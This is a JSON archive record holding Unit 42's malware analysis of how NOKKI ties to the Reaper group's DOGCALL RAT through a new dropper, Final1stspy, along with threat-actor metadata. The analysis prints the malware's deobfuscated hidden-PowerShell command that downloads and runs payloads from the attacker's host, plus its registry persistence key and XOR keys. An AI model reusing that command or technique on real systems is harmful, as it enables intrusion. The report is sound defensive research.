{ "id": "2c0721c6-9712-4031-b962-e8d2d22e6971", "created_at": "2026-04-06T00:13:34.507387Z", "updated_at": "2026-04-10T13:11:49.99483Z", "deleted_at": null, "sha1_hash": "9e3af72df785ba786f695774506442edf3820c3c", "title": "NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 688430, "plain_text": "NOKKI Almost Ties the Knot with DOGCALL: Reaper Group\r\nUses New Malware to Deploy RAT\r\nBy Josh Grunzweig\r\nPublished: 2018-10-01 · Archived: 2026-04-05 21:19:54 UTC\r\nRecently, Unit 42 identified the NOKKI malware family that was used in attacks containing politically-motivated\r\nlures targeting Russian and Cambodian speaking individuals or organizations. As part of this research, an\r\ninteresting tie was discovered to the threat actor group known as Reaper.\r\nThe Reaper group has been publicly attributed to North Korea by other security organizations, targeting\r\norganizations that align with the interests of this country. Such targeted organizations include the military and\r\ndefense industry within South Korea, as well as a Middle Eastern organization that was doing business with North\r\nKorea. Part of this group’s modus operandi includes the use of a custom malware family called DOGCALL.\r\nDOGCALL is a remote access Trojan (RAT) that uses third-party hosting services to upload data and accept\r\ncommands. At the time of publication, we observe this particular malware family in use by the Reaper threat actor\r\ngroup only.\r\nThis blog details the relationship found between the NOKKI and DOGCALL malware families, as well provides\r\nadditional information about a previously unreported malware family used to deploy DOGCALL, which we have\r\nnamed Final1stspy based on a pdb string in the malware.\r\nTying the Knot\r\nWhile researching the NOKKI malware threat, Unit 42 discovered the most recent cluster of attacks beginning in\r\nJuly 2018 leveraged malicious macros within a Microsoft Word document. These particular macros were not\r\noverly complex in nature, and simply would attempt to perform the following actions:\r\n1. Download and run an executable malware payload.\r\n2. Download and open a Microsoft Word decoy document.\r\nTo avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64\r\nencoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into\r\nhex, and then convert that hex into a text string.\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 1 of 9\n\nFigure 1 Malicious macro downloading remote payload and executing it (comments added by Unit 42 for clarity)\r\nFigure 2 Malicious macro implementing unique deobfuscation scheme (comments added by malware author\r\nBy searching on this unique deobfuscation technique present in all samples delivering NOKKI, a single other file\r\nwas identified. This file had the following properties:\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 2 of 9\n\nMD5 e02024f38dfb6290ce0d693539a285a9\r\nSHA1 d13fc918433c705b49db74c91f56ae6c0cb5cf8d\r\nSHA256 66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51\r\nCreator Windows User\r\nCreated Date 2018-03-19 07:58:00 UTC\r\nLast Modified Date 2018-06-16 14:19:00 UTC\r\nOriginal Filename World Cup predictions.doc\r\nBased on the original filename, we can surmise this malware sample targeted individuals interested in the World\r\nCup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between\r\nthe samples is identical, including the comments included by the author.\r\nFigure 3 Similarities between NOKKI dropper and World Cup predictions dropper\r\nWhile the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI\r\ndropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware\r\nsample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word\r\ndocument to provide the lure for the victim.\r\nThe lure in question includes the below text from a publicly available article written on ESPN in the UK:\r\n“Peru and Denmark face off in the third match, and this time it doesn't seem as one sided. Four people go for a\r\nPeru victory, three for Denmark and three for the draw.\r\nLast but not least, we get to see Croatia and Nigeria for the first time. Our Nigeria expert, Colin, reckons there will\r\nbe plenty of goals and a 3-2 win for his side -- the only person to back the Super Eagles.\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 3 of 9\n\nCheck out how our pundits got on with their predictions for following games and remember to join the pundits'\r\nleague in Match Predictor.\r\nWe've got our top talent on hand from England, the United States, Mexico, Brazil, Argentina, Colombia, Australia,\r\nand Africa -- many of whom will be based out in Russia for the tournament -- to analyze each and every one of the\r\n64 matches.\r\nWe'll score our experts just as we do in the Match Predictor -- 10 points for correct result, with a bonus 20 points\r\nfor getting the score line right too.”\r\nInterestingly enough, two commented out lures were also included in this document. One simply contains the\r\nphrase of “I miss u.”, but the second lure contains text from a publicly available article online discussing a visit by\r\nthe North Korean leader to Singapore, shown below.\r\n“This aircraft seems to have conveyed a North Korean advance team including diplomats and security personnel.\r\nThe 747-400, which just landed in Singapore, was apparently used to fly Kim and his personal aides to the\r\nsummit.\r\nThis would also be consistent with our previous reporting that North Korea had settled on such a plan.\r\nThe Jumbo Jet in question is quite special. B-2447 is used by the top rungs of the Chinese government,\r\npredominantly President Xi Jinping and his entourage, when traveling abroad.\r\nIt is capable of being specially outfitted with a VIP interior and has special interfaces for secure satellite\r\ncommunications among other modifications.\r\nWith this in mind, it wasn't surprising seeing it being used as 'Kim Force One' for this special mission.”\r\nWhen the chain of execution completes on the World Cup predictions.doc file, a DOGCALL malware sample is\r\nexecuted on the victim machine.\r\nThe commented lure and payload used by the malware provides an interesting detail given that DOGCALL has\r\nbeen attributed to the threat actor group known as Reaper, which has been attributed to North Korea by other\r\nsecurity organizations.\r\nContinuing Execution of the Malware\r\nAfter the initial execution of World Cup predictions.doc is run, it proceeds to download a VBScript file from the\r\nfollowing URL:\r\nhttp:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html\r\nThis VBScript file yet again contains the exact same unique deobfuscation routine that was previously discussed.\r\nWhen this second stage VBScript file executes, it begins by writing the following data to\r\n%APPDATA%\\Microsoft\\mib.dat. This file will later be used by the Final1stspy malware family, which we\r\ndiscuss later in this post.\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 4 of 9\n\n1111:rom*E8FEF0CDF6C1EBBA90794B2B\r\nAfter this file is written, it will execute the following (deobfuscated):\r\n1\r\nobjShell.Run \"cmd.exe /k powershell.exe\" \u0026 \" \" \u0026 \"-windowstyle\" \u0026 \" \" \u0026 \"hidden\" \u0026 \" \" \u0026 \"-\r\nExecutionPolicy Bypass\" \u0026 \" \" \u0026 \"$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'\" \u0026 \";\" \u0026\r\n\"$f='%APPDATA%/Microsoft/ieConv.exe'\" \u0026 \";\" \u0026 \"$x='\" \u0026 \"http://\" \u0026 \"kmbr1.nitesbr1.org\" \u0026\r\n\"/UserFiles/File/image/images/happy.jpg\" \u0026 \"';\" \u0026 \"$t='\" \u0026 \"http://\" \u0026 \"kmbr1.nitesbr1[.]org\" \u0026\r\n\"/UserFiles/File/image/images/wwwtest.jpg\" \u0026 \"';\" \u0026 \"(\" \u0026 \"New-Object System.Net.WebClient\" \u0026 \")\"\r\n\u0026 \".DownloadFile($t,$f)\" \u0026 \";\" \u0026 \"(\" \u0026 \"New-Object System.Net.WebClient\" \u0026 \")\" \u0026\r\n\".DownloadFile($x,$h)\" \u0026 \";\" \u0026 \"Start-Process $f\" \u0026 \";\" \u0026 \"Stop-Process\" \u0026 \" \" \u0026 \"-processname\" \u0026 \"\r\n\" \u0026 \"cmd\", 0\r\nThis executed code simply downloads two files from http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/happy.jpg\r\n and http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/wwwtest.jpg and stores them in\r\n%APPDATA%/Microsoft/Windows/msvcrt32.dll and %APPDATA%/Microsoft/ieConv.exe, respectively. Finally,\r\nthe VBScript file will execute the previously downloaded ieConv.exe file in a new process.\r\nThese two files are instances of a previously unreported dropper malware family that we are calling Final1stspy.\r\nOverview of Final1stspy\r\nAs previously stated, the Final1stspy malware family is split between an executable file and a DLL. These files\r\nhave the following properties (Note: the DLL information is provided after it is decrypted by the malware):\r\nMD5 0f1d3ed85fee2acc23a8a26e0dc12e0f\r\nSHA1 3d161de48d3f4da0aefff685253404c8b0111563\r\nSHA256 fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3a\r\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFilename wwwtest.jpg\r\nCompile Timestamp 2018-06-01 15:52:41 UTC\r\nPDB String E:\\Final Project(20180108)\\Final1stspy\\LoadDll\\Release\\LoadDll.pdb\r\nMD5 a2fe5dcb08ae8b72e8bc98ddc0b918e7\r\nSHA1 741dbdb20d1beeb8ff809291996c8b78585cb812\r\nSHA256 0669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9a\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 5 of 9\n\nFilename happy.jpg\r\nCompile\r\nTimestamp\r\n2018-06-17 17:04:15 UTC\r\nPDB String\r\nE:\\Final Project(20180108)\\Final1stspy\\hadowexecute -\r\nCopy\\Release\\hadowexecute.pdb\r\nAs we can see, both samples were compiled within a couple weeks of each other. Additionally, the original\r\nMicrosoft Word document used to deliver this malware was last modified roughly a day before the DLL was\r\ncompiled.\r\nBoth the executable and DLL make use of a specific routine to obfuscate strings of importance. The following\r\ncode, written in Python, decodes these strings:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nimport base64\r\ndata = \"[Obfuscated String]\"\r\ndataDecoded = b64decode(data)\r\noutVar = \"\"\r\nfor char in dataDecoded:\r\noutVar += chr(((ord(char) + 122) ^ 0x19) \u0026 0xff)\r\nprint(outVar)\r\nThe Final1stspy malware begins by looking for the presence of the following file:\r\n%APPDATA%\\Microsoft\\Windows\\msvcrt64.dll\r\nShould this file be present, the malware will load the DLLs and attempt to call the exported main_func function.\r\nOtherwise, the malware will look for the following file:\r\n%APPDATA%\\Microsoft\\Windows\\msvcrt32.dll\r\nIn the event this file is present, the malware will decrypt this file by XORing it against 0x50, write it to the\r\npreviously mentioned msvcrt64.dll path, and load the main_func function.\r\nThis DLL uses the same string obfuscation routine witnessed in the executable. It begins by collecting basic\r\nsystem information and ensuring persistence by setting the following registry key to point to\r\n%APPDATA%/Microsoft/ieConv.exe:\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 6 of 9\n\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\rundll32\r\nThe Final1stspy malware family continues to read and parse the previously written mib.dat file. The data is parsed\r\nto eventually be used in subsequent HTTP GET requests, representing the Index, Account, and Group variables.\r\nOriginal String 1111:rom*E8FEF0CDF6C1EBBA90794B2B\r\nIndex 1111\r\nAccount E8FEF0CDF6C1EBBA90794B2B\r\nGroup Rom\r\nFinal1stspy has the ability to read in a %APPDATA%/Microsoft/olevnc.ini file that has several variables stored\r\nwithin it, such as the user-agent, URL, port, and interval counts. In the event this file is not present, such as in our\r\ngiven situation, the malware will default to a hardcoded user-agent and URL. This particular sample\r\ncommunicates with http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php with a user-agent of Host Process\r\nUpdate.\r\nThe malware proceeds to make a HTTP GET request to the URL, such as the following example:\r\nFigure 4 HTTP request made by Final1stspy malware family\r\nThe following GET parameters are present in this request:\r\nVariable Data\r\nMachineId MD5 generated from data obtained from machine victim\r\nInfoSo Microsoft Windows version information and CPU architecture\r\nIndex Data obtained from mib.dat\r\nAccount Data obtained from mib.dat\r\nGroup Data obtained from mib.dat\r\nList List of running processes (base64-encoded)\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 7 of 9\n\nThe malware expects to receive a payload that will subsequently be decrypted using a single-byte XOR key of\r\n0x49. This payload will be loaded on the victim machine. After decryption, the following payload was identified:\r\nMD5 05d43d417a8f50e7b23246643fc7e03d\r\nSHA1 67c05b3937d94136eda4a60a2d5fb685abc776a1\r\nSHA256 3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918f\r\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFilename girl.jpg\r\nCompile Timestamp 2018-05-26 10:46:59 UTC\r\nAs we can see by the compile timestamp above, this file appears to have been compiled close to the Final1stspy\r\nexecutable. This payload has been identified as belonging to the DOGCALL malware family. It is able to perform\r\nthe following actions on the victim:\r\nTake screenshots\r\nKeylogging\r\nCapture microphone data\r\nCollect victim information\r\nCollect files of interest\r\nDownload and execute additional payloads\r\nThe malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is\r\nconfigured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included.\r\nConclusion\r\nWhat originally began as research surrounding a new malware family named NOKKI that had code overlap and\r\nother ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat\r\nactor group. There are some curious aspects to this relationship, such as commented out North Korean-related lure\r\ninformation and DOGCALL malware payload. Additionally, we discovered yet another malware family that has\r\nnot been previously publicly reported that we have named Final1stspy.\r\nUnit 42 will continue to monitor this threat and report on any updates encountered in the future. Palo Alto\r\nNetworks customers are protected against this threat in the following ways:\r\nAll malware encountered is appropriately classified as malicious by WildFire\r\nTRAPs blocks this threat\r\nAutoFocus customers may track this threat via the KONNI, NOKKI, Final1stspy, DOGCALL, and Reaper\r\nIndicators of Compromise\r\nWorld Cup predictions Sample\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 8 of 9\n\n66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51\r\nFinal1stspy Samples\r\n0669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9a\r\nfb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3a\r\nDOGCALL Samples\r\n3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918f\r\nInfrastructure\r\nkmbr1.nitesbr1[.]org\r\nSource: https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" ], "report_names": [ "unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434414, "ts_updated_at": 1775826709, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9e3af72df785ba786f695774506442edf3820c3c.pdf", "text": "https://archive.orkl.eu/9e3af72df785ba786f695774506442edf3820c3c.txt", "img": "https://archive.orkl.eu/9e3af72df785ba786f695774506442edf3820c3c.jpg" } }